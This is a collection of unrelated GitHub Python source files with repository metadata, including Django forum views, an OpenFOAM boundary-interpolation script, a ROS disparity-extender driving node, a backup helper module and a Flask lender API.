# 创建或者获取这条话题,并保存\n topic, created = Topic.objects.get_or_create(author=user, topic_title=topic_title, content=content, category=category)\n topic.save()\n # 首先根据TopicComment表中计算出每个话题的评论数,然后根据评论数进行排序,并取前十个\n hot_topics = Topic.objects.annotate(comment_count=Count(\"topiccomment__topic\")).order_by('-comment_count')[0:10]\n context = {}\n context['topic'] = topic\n context['topicform'] = topicform\n context['hot_topics'] = hot_topics\n return render(request, 'topic.html',context)\n\n\ndef topic_detail(request,id):\n topic = get_object_or_404(Topic,id=id)\n # 打开话题一次,就计算一个阅读数\n topic.read_num += 1\n topic.save()\n topicform = TopicCommentForm()\n topic_comments = TopicComment.objects.filter(topic=topic, parent=None)\n # 筛选出评论最多的十个话题\n # 首先根据TopicComment表中计算出每个话题的评论数,然后根据评论数进行排序,并取前十个\n hot_topics = Topic.objects.annotate(comment_count=Count(\"topiccomment__topic\")).order_by('-comment_count')[0:10]\n\n context = {}\n context['topic'] = topic\n context['topicform'] = topicform\n context['topic_comments'] = topic_comments\n context['hot_topics'] = hot_topics\n return render(request,'topic.html',context)\n\ndef topic_comment(request):\n user = request.user\n topiccomment_form = TopicCommentForm(request.POST, request.FILES)\n topicform = TopicCommentForm()\n context = {}\n if topiccomment_form.is_valid():\n topic_id = topiccomment_form.cleaned_data['topic_id']\n reply_comment_id = topiccomment_form.cleaned_data['reply_comment_id']\n content = topiccomment_form.cleaned_data['content']\n\n topic = Topic.objects.get(pk=topic_id)\n topiccomment = TopicComment()\n # 现在判断传入的这个数值是不是0,若是0,那它就是最顶级的评论,它的父级评论、根评论、回复人都是空的\n if reply_comment_id == 0:\n topiccomment.parent = None\n topiccomment.root = None\n topiccomment.reply_to = None\n # 如果现在传入的评论id不是0,那就看看根据这个id是不是能找到相应的评论\n #如果评论存在的话,那这个评论就是当前评论的父级评论,它的user就是被回复人,这条评论的根评论也是当前评论的根评论\n elif TopicComment.objects.filter(pk=reply_comment_id).exists():\n topiccomment.parent = TopicComment.objects.get(pk=reply_comment_id)\n # 如果根评论存在就是根评论,如果根评论不存在,那么父级评论就是他的根评论\n if topiccomment.parent.root:\n topiccomment.root = topiccomment.parent.root\n else:\n topiccomment.root = topiccomment.parent\n topiccomment.reply_to = topiccomment.parent.user\n topiccomment.user = user\n topiccomment.comment = content\n topiccomment.topic = topic\n if topiccomment.comment != '':\n topiccomment.save()\n # 保存之后跳转到话题的详情页\n return redirect(\"community:topic_detail\", id=topic_id)\n\n\ndef topic_comment_like(request):\n user = request.user\n topiccomment_id = request.GET.get('topiccomment_id')\n is_active = request.GET.get('is_active')\n topic_id = request.GET.get('topic_id')\n print(topiccomment_id)\n print(is_active)\n print(topic_id)\n \n data = {}\n # 如果返回的评论id为0,说明这是对原帖子的点赞\n if topiccomment_id == '0':\n topic = Topic.objects.get(pk=topic_id)\n if is_active == 'false':\n like_topic, created = LikeTopic.objects.get_or_create(topic=topic, user=user, like_status='1')\n data['status'] = 'SUCESS'\n else:\n like_topic = LikeTopic.objects.filter(topic=topic, user=user, like_status='1')\n if like_topic.exists():\n like_topic.delete()\n data['status'] = 'SUCESS'\n else:\n data['status'] = 'ERROR'\n # 如果返回的评论id不为0,那么就是对评论进行的点赞\n else:\n topiccomment = TopicComment.objects.get(pk=topiccomment_id)\n # 处理数据,如果点赞图标处于未点赞状态,那么就创造一条点赞记录\n if is_active == 'false':\n # 正在执行点赞动作,从数据库中获取或者创造一条点赞记录\n like_topiccomment, created = LikeTopicComment.objects.get_or_create(comment=topiccomment, user=user, like_status='1')\n data['status'] = 'SUCESS'\n \n else:\n # 点赞图标处于点赞状态,正在执行取消点赞动作,先获取这条点赞的记录\n like_topiccomment = LikeTopicComment.objects.filter(comment=topiccomment, user=user, like_status='1')\n # 如果这条点赞记录存在,那么删除这条记录\n if like_topiccomment.exists():\n like_topiccomment.delete()\n data['status'] = 'SUCESS'\n else:\n data['status'] = 'ERROR'\n # data['articlecomment_id'] = articlecomment_id\n return JsonResponse(data)\n\n \n# 对每个类型的话题进行分类展示,排序方法有按照你时间逆序、按照点击最多、按照评论最多\ndef topic_categry(request,category):\n topicform = TopicCreateForm()\n topics = Topic.objects.filter(category=category)\n\n if request.GET.get('order') == 'read_num': \n topics = Topic.objects.filter(category=category).order_by('-read_num')\n order = 'read_num'\n elif request.GET.get('order') == 'comment_num':\n topics = Topic.objects.filter(category=category).annotate(comment_count=Count(\"topiccomment__topic\")).order_by('-comment_count')\n order = 'comment_num'\n else:\n topics = Topic.objects.filter(category=category)\n order = 'created_time'\n\n # 对挑选出的分类文章进行分页\n paginator = Paginator(topics,10)\n page_num = request.GET.get('page',1)\n page_of_topics = paginator.get_page(page_num)\n #总页数\n num_pages = paginator.num_pages\n\n # 设定当前页左右显示页数\n around_count = 2\n # 获取当前页码、左侧页码、右侧页码\n current_page = page_of_topics.number\n\n left_has_more = False\n right_has_more = False\n if current_page <= around_count+2:\n left_pages = range(1,current_page)\n else:\n left_has_more = True\n left_pages = range(current_page-around_count,current_page)\n if current_page >= num_pages-around_count-1:\n right_pages = range(current_page+1,num_pages+1)\n else:\n right_has_more = True\n right_pages = range(current_page+1,current_page+around_count+1)\n\n hot_topics = Topic.objects.annotate(comment_count=Count(\"topiccomment__topic\")).order_by('-comment_count')[0:10]\n context = {}\n # 一共分了多少页\n context['page_of_topics'] = page_of_topics\n # context['page_range'] = paginator.page_range\n context['left_pages'] = left_pages\n context['current_page'] = current_page\n context['right_pages'] = right_pages\n context['left_has_more'] = left_has_more\n context['right_has_more'] = right_has_more\n context['num_pages'] = num_pages\n context['order'] = order\n context['hot_topics'] = hot_topics\n context['category'] = category\n context['topicform'] = topicform\n\n return render(request,'community_category.html',context)\n\ndef topic_search(request):\n topicform = TopicCreateForm()\n # 获取搜索关键词,并去除首尾空格\n search_words = request.GET.get('topic_search','').strip()\n # 如果有程序直接绕过前端输入了空字符串,那么就直接返回首页\n if len(search_words) == 0:\n return render(request,'community_home.html')\n else:\n condition = None\n for word in search_words.split(' '):\n if condition is None:\n condition = Q(topic_title__icontains=word) | Q(content__icontains=word)\n else:\n condition = condition | Q (topic_title__icontains=word) | Q(content__icontains=word)# ~:非 $:并 |:或 \n search_topics = Topic.objects.filter(condition).order_by('-created_time')\n # search_articles = Article.objects.filter(article_title__icontains=search_word)\n # 对搜索结果分页\n paginator = Paginator(search_topics,20)\n page_num = request.GET.get('page',1)\n page_of_topics = paginator.get_page(page_num)\n #总页数\n num_pages = paginator.num_pages\n\n # 设定当前页左右显示页数\n around_count = 2\n # 获取当前页码、左侧页码、右侧页码\n current_page = page_of_topics.number\n\n left_has_more = False\n right_has_more = False\n if current_page <= around_count+2:\n left_pages = range(1,current_page)\n else:\n left_has_more = True\n left_pages = range(current_page-around_count,current_page)\n if current_page >= num_pages-around_count-1:\n right_pages = range(current_page+1,num_pages+1)\n else:\n right_has_more = True\n right_pages = range(current_page+1,current_page+around_count+1)\n\n hot_topics = Topic.objects.annotate(comment_count=Count(\"topiccomment__topic\")).order_by('-comment_count')[0:10]\n\n context = {}\n context['search_words'] = search_words\n context['search_topics_count'] = search_topics.count()\n context['page_of_topics'] = page_of_topics\n # context['page_range'] = paginator.page_range\n context['left_pages'] = left_pages\n context['current_page'] = current_page\n context['right_pages'] = right_pages\n context['left_has_more'] = left_has_more\n context['right_has_more'] = right_has_more\n context['num_pages'] = num_pages\n context['hot_topics'] = hot_topics\n context['topicform'] = topicform\n return render(request,'community_search.html',context)\n\n\n\n\n\n\n","repo_name":"xiangjianjiangnan/mysite","sub_path":"community/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11527,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"13585197174","text":"#! /usr/bin/python\n# -*- coding: utf-8 -*-\nimport time, math\nfrom scipy.optimize import fsolve\nfrom scipy.integrate import quad\nfrom scipy.interpolate import griddata\n#from matplotlib.mlab import griddata\nimport numpy as np\n\n#=====================================================================================\n#\n#\tAuthor:\t\tSamuel Chang\n#\tDate:\t\tSep. 07. 2015\n#\tFunction:\tMatch the generated boundary data to 3D domain\n#\tUsage:\t\t1.python writeSetDiscreteFieldsDict.py\t\n#\n#\n#*************************************************************************************\n\nboundaryData = []\nheight_boundary = []\nu1 = []; u2 = []; u3 = []; T = []; k = []; epsilon = [];\nfile= open(\"../generateBoundary/boundaryData.dat\",\"r\")\nfor line in file:\n\tboundaryData.append(line.split(\"\t\"))\nfile.close()\n\nfor line in boundaryData:\n\theight_boundary.append(float(line[0]))\n\tu1.append(float(line[1]))\n\tu2.append(float(line[2]))\n\tu3.append(float(line[3]))\n\tT.append(float(line[4]))\n\tk.append(float(line[5]))\n\tepsilon.append(float(line[6]))\t\n\ninletPatchXYZ = []\nfile= open(\"../inletPatchCoordinate.dat\",\"r\")\nfor line in file:\n\tinletPatchXYZ.append(line.split(\"\t\"))\nfile.close()\ninletX = []; inletY = []; inletZ = []\nfor line in inletPatchXYZ:\n\tinletX.append(float(line[0]))\n\tinletY.append(float(line[1]))\n\tinletZ.append(float(line[2]))\n\n\nu1_patch = griddata(height_boundary, np.asarray(u1), inletZ, method='linear')\nu2_patch = griddata(height_boundary, np.asarray(u2), inletZ, method='linear')\nu3_patch = griddata(height_boundary, np.asarray(u3), inletZ, method='linear')\nT_patch = griddata(height_boundary, np.asarray(T), inletZ, method='linear')\nk_patch = griddata(height_boundary, np.asarray(k), inletZ, method='linear')\nepsilon_patch = griddata(height_boundary, np.asarray(epsilon), inletZ, method='linear')\n\n\n#-------------\twriting the interpolated data to setDiscreteFieldsDict\t---------------------#\n\n\nheader =[]\nfile= open(\"headers/setDiscreteFieldsDictHeader\",\"r\")\nfor line in file:\n\theader.append(line)\t\nfile.close()\n\nheaderU =[]\nfile= open(\"headers/setDiscreteFieldsDictPartU\",\"r\")\nfor line in file:\n\theaderU.append(line)\t\nfile.close()\n\nheaderk =[]\nfile= open(\"headers/setDiscreteFieldsDictPartk\",\"r\")\nfor line in file:\n\theaderk.append(line)\t\nfile.close()\n\nheaderT =[]\nfile= open(\"headers/setDiscreteFieldsDictPartT\",\"r\")\nfor line in file:\n\theaderT.append(line)\t\nfile.close()\n\nheaderEps =[]\nfile= open(\"headers/setDiscreteFieldsDictPartEps\",\"r\")\nfor line in file:\n\theaderEps.append(line)\t\nfile.close()\n\n#-----------------writing header------------------------#\nfile = open(\"../system/setDiscreteFieldsDict\",\"w\")\nfor line in header:\n file.write(line)\n \n#--------writing U\nfor line in headerU:\n file.write(line) \n\nfor i in range(0,len(inletZ)):\n\tfile.write(\"\t\t\t(\"+str(inletX[i])+\" \"+str(inletY[i])+\" \"+str(inletZ[i])+\" \"+str(u1_patch[i])+\" \"+str(u2_patch[i])+\" \"+str(u3_patch[i])+\")\"+\"\\n\")\nfile.write(\" ); \"+\"\\n\")\nfile.write(\"\t} \"+\"\\n\")\n\n#--------writing k\nfor line in headerk:\n file.write(line) \n\nfor i in range(0,len(inletZ)):\n\tfile.write(\"\t\t\t(\"+str(inletX[i])+\" \"+str(inletY[i])+\" \"+str(inletZ[i])+\" \"+str(k_patch[i])+\")\"+\"\\n\")\nfile.write(\" ); \"+\"\\n\")\nfile.write(\"\t} \"+\"\\n\")\n\n#--------writing T\nfor line in headerT:\n file.write(line) \n\nfor i in range(0,len(inletZ)):\n\tfile.write(\"\t\t\t(\"+str(inletX[i])+\" \"+str(inletY[i])+\" \"+str(inletZ[i])+\" \"+str(T_patch[i])+\")\"+\"\\n\")\nfile.write(\" ); \"+\"\\n\")\nfile.write(\"\t} \"+\"\\n\")\n\n#--------writing epsilon\nfor line in headerEps:\n file.write(line) \n\nfor i in range(0,len(inletZ)):\n\tfile.write(\"\t\t\t(\"+str(inletX[i])+\" \"+str(inletY[i])+\" \"+str(inletZ[i])+\" \"+str(epsilon_patch[i])+\")\"+\"\\n\")\nfile.write(\" ); \"+\"\\n\")\nfile.write(\"\t} \"+\"\\n\")\n\nfile.write(\"); \"+\"\\n\")\t\n","repo_name":"ChiYaoCh/boundaryGenerator","sub_path":"case/demo/utilities/writeSetDiscreteFieldsDict.py","file_name":"writeSetDiscreteFieldsDict.py","file_ext":"py","file_size_in_byte":3777,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"35434996468","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*- \n\nimport os\nimport re\nimport sys\n\nimport pymongo\n\n\ndirWithIds = sys.argv[1]\n\npazansMongo = pymongo.MongoClient(\"equal.cf\")\npazansDb = pazansMongo['pazans']\npazansCollection = pazansDb['pazans']\n\n# gotoMongo = pymongo.MongoClient(\"goto.reproducible.work\")\n# gotoDb = gotoMongo['vk']\n# gotoUserCollection = gotoDb['users']\nusersJsonFile = sys.argv[2]\n\nids = set()\n\nidsFile = sys.argv[3]\nif not os.path.isfile(idsFile):\n idsRegex = re.compile('\\\\\"_id\\\\\": (.+?),')\n with open(usersJsonFile, \"r\") as file_name:\n for line in file_name:\n groups = idsRegex.search(line)\n uid = int(groups.group(1))\n ids.add(uid)\n\n with open(idsFile, \"w\") as file_name:\n for uid in ids:\n file_name.write(str(uid) + \"\\n\")\nelse:\n with open(idsFile, \"r\") as f_ids:\n for line in f_ids:\n f_ids.add(int(line))\n\nfor file_name in os.listdir(dirWithIds):\n print(\"parsing {}\".format(file_name))\n\n with open(os.path.join(dirWithIds, file_name), \"r\") as f_out:\n for line in f_out:\n uid = int(line)\n if uid in ids:\n pazan = pazansCollection.find_one(uid)\n if pazan is None:\n pazansCollection.insert_one({\"_id\": uid, \"groups\": [file_name]})\n elif file_name not in pazan[\"groups\"]:\n pazan[\"groups\"].append(file_name)\n pazansCollection.update_one(\n {\"_id\": pazan[\"_id\"]},\n {\"$set\": {\"groups\": pazan[\"groups\"]}}\n )\n\n print(\"- done\")\n","repo_name":"AlekseyLobanov/gotohack","sub_path":"push-pazans-to-mongo.py","file_name":"push-pazans-to-mongo.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"2"}
+{"seq_id":"22473600084","text":"def palind(n):\r\n m, tmp = n, 0\r\n while m != 0:\r\n tmp = tmp * 10 + m % 10\r\n m //= 10\r\n return tmp == n\r\n\r\ndef check(n):\r\n cnt = 0\r\n while n != 0:\r\n r = n % 10\r\n if r % 2 != 0: return False\r\n cnt += 1\r\n n //= 10\r\n return cnt % 2 == 0\r\n\r\nif __name__ == '__main__':\r\n TC = int(input())\r\n for t in range(TC):\r\n n = int(input())\r\n for x in range(22, n):\r\n if check(x) and palind(x): print(x, end = ' ')\r\n print()","repo_name":"B20DCPT094/PYTHON_CODE_PTIT","sub_path":"PY01011-LIETKESODEP.py","file_name":"PY01011-LIETKESODEP.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"}
+{"seq_id":"23139226958","text":"\r\nimport os\r\n\r\n\r\ndef fileexists(p=\"path\"):\r\n return os.path.exists(p)\r\n\r\n\r\ndef getFilesNFolder(p=\"path\"):\r\n try:\r\n dateien=[]\r\n ordner=[]\r\n for found in os.listdir(p): \r\n if os.path.isdir(p+found):\r\n found=found.lower()\r\n ordner.append(found)\r\n #print(\"Ordner: \"+found)\r\n else:\r\n dateien.append(found)\r\n #print(\"Datei : \"+found)\r\n return dateien,ordner\r\n except:\r\n print(\"ERROR TRY OTHER DIRECTORY\")\r\n return\r\n\r\ndef getFilesNUnterordner(o=[],q=\"quelle\",e=\"Ebenen\"):\r\n o2=[]\r\n error=0\r\n errorl=[]\r\n dateien=[]\r\n dateienex=[]\r\n for i in range(0,len(o)):#o sind die Unterordner des quellenverzeichnis\r\n print(\"Unterordner: \"+o[i])\r\n if o[i][-1]!=\"\\\\\":\r\n o[i]+=\"\\\\\"\r\n try:\r\n d,o1=getFilesNFolder(q+o[i])#o1 sind die unterordner eines unterordners des quellenverzeichnisses\r\n except:\r\n print(\"ERROR: \"+q+o[i])\r\n errorl.append(\"coudn't read Directory \"+q+o[i])\r\n error+=1\r\n continue\r\n for j in range(0,len(d)):\r\n fn,fx=os.path.splitext(q+o[i]+d[j])\r\n dateien.append(fn)\r\n dateienex.append(fx) \r\n for j in range(0,len(o1)):\r\n o2.append(o[i]+o1[j])#o2 hat alle unterordner der unterordner des quellenverzeichnisses\r\n del d,o1\r\n if e!=0:\r\n if e==1:\r\n e=-1\r\n else:\r\n e-=1\r\n #print(\"en(o2): \"+str(len(o2)))\r\n #print(\"e: \"+str(e)) #works until here\r\n\r\n while(len(o2)!=0 and e==0 or len(o2)!=0 and e!=-1):\r\n o3=[]\r\n if e!=0:\r\n if e==1:\r\n e=-1\r\n else:\r\n e-=1\r\n for i in range(0,len(o2)):\r\n print(\"Unterordner: \"+o2[i])\r\n if o2[i][-1]!=\"\\\\\":\r\n o2[i]+=\"\\\\\"\r\n try:\r\n d,o1=getFilesNFolder(q+o2[i])#01 unterordner von o1\r\n except:\r\n print(\"ERROR: \"+q+o2[i])\r\n errorl.append(\"coudn't read Directory \"+q+o2[i])\r\n error+=1\r\n continue\r\n for j in range(0,len(d)):\r\n fn,fx=os.path.splitext(q+o2[i]+d[j])\r\n dateien.append(fn)\r\n dateienex.append(fx)\r\n for j in range(0,len(o1)):\r\n o3.append(o2[i]+o1[j])\r\n del d,o1\r\n o2=o3\r\n return dateien,dateienex,error,errorl\r\n\r\n\r\ndef setquelle():\r\n translation_table = dict.fromkeys(map(ord, '/'), '\\\\')#:->nichts\r\n quelle=input(\"Quellenverzeichnis: \")\r\n if not quelle:\r\n print(\"You typed nothing\")\r\n return None\r\n elif quelle[-1] != \"\\\\\":\r\n quelle+=\"\\\\\"\r\n \r\n if not os.path.isdir(quelle): #checkt ob das Quellenverzeichnis existiert\r\n print(\"Quellenverzeichnis \"+quelle+ \" konnte nicht gefunden werden\")\r\n return None\r\n else:\r\n #quelle=quelle.lower()\r\n quelle=quelle.translate(translation_table)\r\n return quelle\r\n\r\ndef setZiel():\r\n translation_table = dict.fromkeys(map(ord, '/'), '\\\\')#:->nichts\r\n default=os.path.dirname(os.path.realpath(__file__))+\"\\\\TARGETFOLDER\\\\\"\r\n ziel=input(\"Zielverzeichnis (ENTER = Standartverzeichnis): \")\r\n if not ziel:\r\n print(\"DEFAULT TARGETFOLDER\")\r\n ziel=default\r\n else:\r\n if ziel[-1]!=\"\\\\\":\r\n ziel=ziel+\"\\\\\"\r\n ziel=ziel.translate(translation_table)\r\n if not os.path.isdir(ziel):\r\n if ziel==default:\r\n os.makedirs(ziel)\r\n return ziel\r\n else:\r\n check=input(\"Das Zielverzeichnis: \"+ziel+\"\\nkonnte nicht gefunden werden\\nmöchten Sie es erstellen? (y/n): \")\r\n if check==\"y\" or check==\"Y\":\r\n try:\r\n os.makedirs(ziel)\r\n ziel=os.path.realpath(ziel)\r\n if ziel[-1]!=\"\\\\\":\r\n ziel=ziel+\"\\\\\"\r\n return ziel\r\n except:\r\n print(\"Das Zielverzeichnis \"+ziel+\"\\n konnte nicht erstellt werden\")\r\n return None\r\n else:\r\n ziel=os.path.realpath(ziel)\r\n if ziel[-1]!=\"\\\\\":\r\n ziel=ziel+\"\\\\\"\r\n return ziel\r\n\r\n\r\ndef setfextenion():\r\n endung=input(\"Dateiendung die du Filtern möchtest: \")\r\n if not endung:\r\n print(\"You typed nothing\")\r\n return None\r\n elif endung[0]!=\".\":\r\n endung=\".\"+endung\r\n return endung\r\n\r\ndef setfextenions(): \r\n endungen=[]\r\n endung=None\r\n while endung==None:\r\n endung=setfextenion()\r\n endungen.append(endung)\r\n check=input(\"Nach einer weiteren Dateiendung suchen? (y/n): \")\r\n while check==\"y\" or check==\"Y\":\r\n endung=None\r\n while endung==None:\r\n endung=setfextenion()\r\n endungen.append(endung)\r\n check=input(\"Nach einer weiteren Dateiendung suchen? (y/n): \")\r\n return endungen\r\n \r\ndef filenamecheck(f=\"datei\"):\r\n zwischen=f\r\n flen=len(f)\r\n j=-1\r\n while f[j]!=\")\"and j>-flen:\r\n j-=1\r\n if f[j]==\")\":\r\n i=j-2\r\n while f[i]!=\"(\" and i>-flen:\r\n i-=1\r\n if i==-flen:\r\n pass#ganz normal (1) anhängen\r\n else:\r\n #zahl rausholen!\r\n try: \r\n zahl=int(f[i+1:j])\r\n zahl+=1 \r\n f=zwischen[:i]+\"(\"+str(zahl)+\")\"+zwischen[j+1:]\r\n return f\r\n except:\r\n #print(\"hey\")\r\n pass\r\n fname,fex=os.path.splitext(zwischen)\r\n fname+=\"(1)\"\r\n f=fname+fex\r\n return f\r\n\r\ndef test():\r\n i=0\r\n p=\"a.mp3\"\r\n print(p)\r\n while i!=99999999:\r\n i+=1\r\n p=filenamecheck(p)\r\n print(p)\r\n\r\ndef getsize(p):\r\n return os.path.getsize(p)\r\n\r\nclass Count1:\r\n i=0\r\n\r\ndC= Count1()\r\ndef b_write(s,p,maxSize=0):\r\n #print(str(dC.i)+\" \"+p)\r\n dC.i+=1\r\n ok=False\r\n size=os.path.getsize(s)\r\n if maxSize!=0 and size > maxSize:\r\n print(\"FILE SIZE BIGGER MAX SIZE\")\r\n return False\r\n \r\n if os.path.isfile(p):\r\n #print(str(dC.i-1)+\" exists\") \r\n if size !=os.path.getsize(p):\r\n print(str(dC.i-1)+\" different size\") \r\n return True\r\n else:\r\n #print(\"IS fine: \"+p)\r\n return False\r\n else:\r\n #print(\"M1 does not exists!\")\r\n return True \r\n \r\n return ok\r\nif __name__=='__main__':\r\n\r\n test()\r\n os.system(\"pause\")\r\n","repo_name":"RomanDietenmeier/Python-Backup-Skript","sub_path":"module1.py","file_name":"module1.py","file_ext":"py","file_size_in_byte":6613,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"31940433522","text":"#!/usr/bin/env python\nimport numpy as np\nimport sys\nimport rospy\nfrom std_msgs.msg import Bool\nfrom sensor_msgs.msg import LaserScan\nfrom ackermann_msgs.msg import AckermannDriveStamped\nfrom nav_msgs.msg import Odometry\nimport math\n\nclass DisparityExtender:\n\n CAR_WIDTH = 0.45\n # the min difference between adjacent LiDAR points for us to call them disparate\n DIFFERENCE_THRESHOLD = 2.\n STRAIGHTS_SPEED = 4.0\n CORNERS_SPEED = 3.0\n DRAG_SPEED = 4.0\n # the extra safety room we plan for along walls (as a percentage of car_width/2)\n SAFETY_PERCENTAGE = 900.\n def __init__(self):\n self.STEERING_SENSITIVITY = 3.\n self.COEFFICIENT = 2.5\n self.EXP_COEFFICIENT = 0.02\n self.X_POWER = 1.8\n self.QUADRANT_FACTOR = 3.5\n\n self.time = rospy.get_time()\n self.speed = 4. # Initial Speed?\n \n lidarscan_topic = '/scan'\n odom_topic = '/vesc/odom'\n drive_topic = '/vesc/low_level/ackermann_cmd_mux/input/teleop' # come back to me later\n \n self.odom_sub = rospy.Subscriber(odom_topic, Odometry,\n self.odom_cb, queue_size=1, buff_size=2**24)\n self.lidar_sub = rospy.Subscriber(lidarscan_topic, LaserScan,\n self.process_lidar, queue_size=1, buff_size=2**24)\n self.drive_pub = rospy.Publisher(drive_topic, AckermannDriveStamped,\n queue_size=1)\n\n def odom_cb(self, data):\n self.speed = data.twist.twist.linear.x\n\n def preprocess_lidar(self, ranges):\n \"\"\" Any preprocessing of the LiDAR data can be done in this function.\n Possible Improvements: smoothing of outliers in the data and placing\n a cap on the maximum distance a point can be.\n \"\"\"\n # remove quadrant of LiDAR directly behind us\n ranges = np.clip(ranges, 0, 16)\n eighth = int(len(ranges)/self.QUADRANT_FACTOR)\n\n return np.array(ranges[eighth:-eighth])\n\n\n def get_differences(self, ranges):\n \"\"\" Gets the absolute difference between adjacent elements in\n in the LiDAR data and returns them in an array.\n Possible Improvements: replace for loop with numpy array arithmetic\n \"\"\"\n differences = [0.] # set first element to 0\n for i in range(1, len(ranges)):\n differences.append(abs(ranges[i]-ranges[i-1]))\n return differences\n\n def get_disparities(self, differences, threshold):\n \"\"\" Gets the indexes of the LiDAR points that were greatly\n different to their adjacent point.\n Possible Improvements: replace for loop with numpy array arithmetic\n \"\"\"\n disparities = []\n for index, difference in enumerate(differences):\n if difference > threshold:\n disparities.append(index)\n return disparities\n\n def get_num_points_to_cover(self, dist, width):\n \"\"\" Returns the number of LiDAR points that correspond to a width at\n a given distance.\n We calculate the angle that would span the width at this distance,\n then convert this angle to the number of LiDAR points that\n span this angle.\n Current math for angle:\n sin(angle/2) = (w/2)/d) = w/2d\n angle/2 = sininv(w/2d)\n angle = 2sininv(w/2d)\n where w is the width to cover, and d is the distance to the close\n point.\n Possible Improvements: use a different method to calculate the angle\n \"\"\"\n angle = 1.5*np.arctan(width/(2*dist))\n num_points = int(np.ceil(angle / self.radians_per_point))\n return num_points\n\n def cover_points(self, num_points, start_idx, cover_right, ranges):\n \"\"\" 'covers' a number of LiDAR points with the distance of a closer\n LiDAR point, to avoid us crashing with the corner of the car.\n num_points: the number of points to cover\n start_idx: the LiDAR point we are using as our distance\n cover_right: True/False, decides whether we cover the points to\n right or to the left of start_idx\n ranges: the LiDAR points\n Possible improvements: reduce this function to fewer lines\n \"\"\"\n new_dist = ranges[start_idx]\n if cover_right:\n for i in range(num_points):\n next_idx = start_idx+1+i\n if next_idx >= len(ranges): break\n if ranges[next_idx] > new_dist:\n ranges[next_idx] = new_dist\n else:\n for i in range(num_points):\n next_idx = start_idx-1-i\n if next_idx < 0: break\n if ranges[next_idx] > new_dist:\n ranges[next_idx] = new_dist\n return ranges\n\n def extend_disparities(self, disparities, ranges, car_width, extra_pct):\n \"\"\" For each pair of points we have decided have a large difference\n between them, we choose which side to cover (the opposite to\n the closer point), call the cover function, and return the\n resultant covered array.\n Possible Improvements: reduce to fewer lines\n \"\"\"\n width_to_cover = 0.155 * (1+extra_pct/100)\n for index in disparities:\n first_idx = index-1\n points = ranges[first_idx:first_idx+2]\n close_idx = first_idx+np.argmin(points)\n far_idx = first_idx+np.argmax(points)\n close_dist = ranges[close_idx]\n num_points_to_cover = self.get_num_points_to_cover(close_dist,\n width_to_cover)\n cover_right = close_idx < far_idx\n ranges = self.cover_points(num_points_to_cover, close_idx,\n cover_right, ranges)\n return ranges\n\n def get_steering_angle(self, range_index, range_len):\n \"\"\" Calculate the angle that corresponds to a given LiDAR point and\n process it into a steering angle.\n Possible improvements: smoothing of aggressive steering angles\n \"\"\"\n lidar_angle = (range_index - (range_len/2)) * self.radians_per_point\n steering_angle = np.clip(lidar_angle, np.radians(-90), np.radians(90))/self.STEERING_SENSITIVITY\n return steering_angle\n\n def process_lidar(self, data):\n \"\"\" Run the disparity extender algorithm!\n Possible improvements: varying the speed based on the\n steering angle or the distance to the farthest point.\n \"\"\"\n drive_msg = AckermannDriveStamped()\n drive_msg.header.stamp = rospy.Time.now()\n\n ranges = data.ranges\n self.radians_per_point = (2*np.pi)/len(ranges)\n proc_ranges = self.preprocess_lidar(ranges)\n differences = self.get_differences(proc_ranges)\n disparities = self.get_disparities(differences, self.DIFFERENCE_THRESHOLD)\n proc_ranges = self.extend_disparities(disparities, proc_ranges,\n self.CAR_WIDTH, self.SAFETY_PERCENTAGE)\n steering_angle = self.get_steering_angle(proc_ranges.argmax(),\n len(proc_ranges))\n\n x = max(proc_ranges[227:237])\n speed = self.COEFFICIENT*math.exp(self.EXP_COEFFICIENT*(x**self.X_POWER))\n rospy.loginfo('x: {}, speed: {}'.format(x, speed))\n\n drive_msg = AckermannDriveStamped()\n drive_msg.header.stamp = rospy.Time.now()\n drive_msg.drive.steering_angle = steering_angle\n drive_msg.drive.speed = speed\n self.drive_pub.publish(drive_msg)\n\nif __name__ == '__main__':\n rospy.init_node(\"disparity_extender_node\", anonymous=True)\n disparity = DisparityExtender()\n rospy.sleep(0.1)\n rospy.spin()\n","repo_name":"FT-Autonomous/f1tenth-disparity-extender","sub_path":"src/disparity.py","file_name":"disparity.py","file_ext":"py","file_size_in_byte":7706,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"40869135500","text":"from flask_restful import Resource, reqparse\nfrom models.lender import LenderModel\n\n\n\nclass LenderResource(Resource):\n parser = reqparse.RequestParser()\n parser.add_argument(\"name\",type=str, required=True, help=\"Must contain key (name) and value as a string in JSON request\")\n \n def get(self, id):\n lender = LenderModel.find_by_id(id)\n if not lender:\n return {\"Message\": \"The lender ID does not exist, please try again using a different ID\"}, 404\n return lender.json()\n\n def post(self):\n data = LenderResource.parser.parse_args()\n\n # lender is instantiated using key word arguments from the request\n lender = LenderModel(**data)\n\n try:\n lender.save_to_db()\n except:\n return {\"Message\": \"An error occured while trying to create a lender\"}, 500\n return lender.json(), 201\n\n def delete(self, id):\n lender = LenderModel.find_by_id(id)\n if lender:\n lender.delete_from_db()\n return {\"Message\": \"Item deleted\"}\n\n \n def put(self, id):\n data = LenderResource.parser.parse_args()\n lender = LenderModel.find_by_id(id)\n\n if lender is None:\n lender = LenderModel(**data)\n else:\n lender.name = data['name']\n lender.save_to_db()\n return lender.json()\n\n\nclass LenderList(Resource):\n def get(self):\n return {\"type\": \"Lenders\", \"data\": [v.json() for v in LenderModel.query.all()]}","repo_name":"williamle92/lender_api","sub_path":"resources/lender.py","file_name":"lender.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
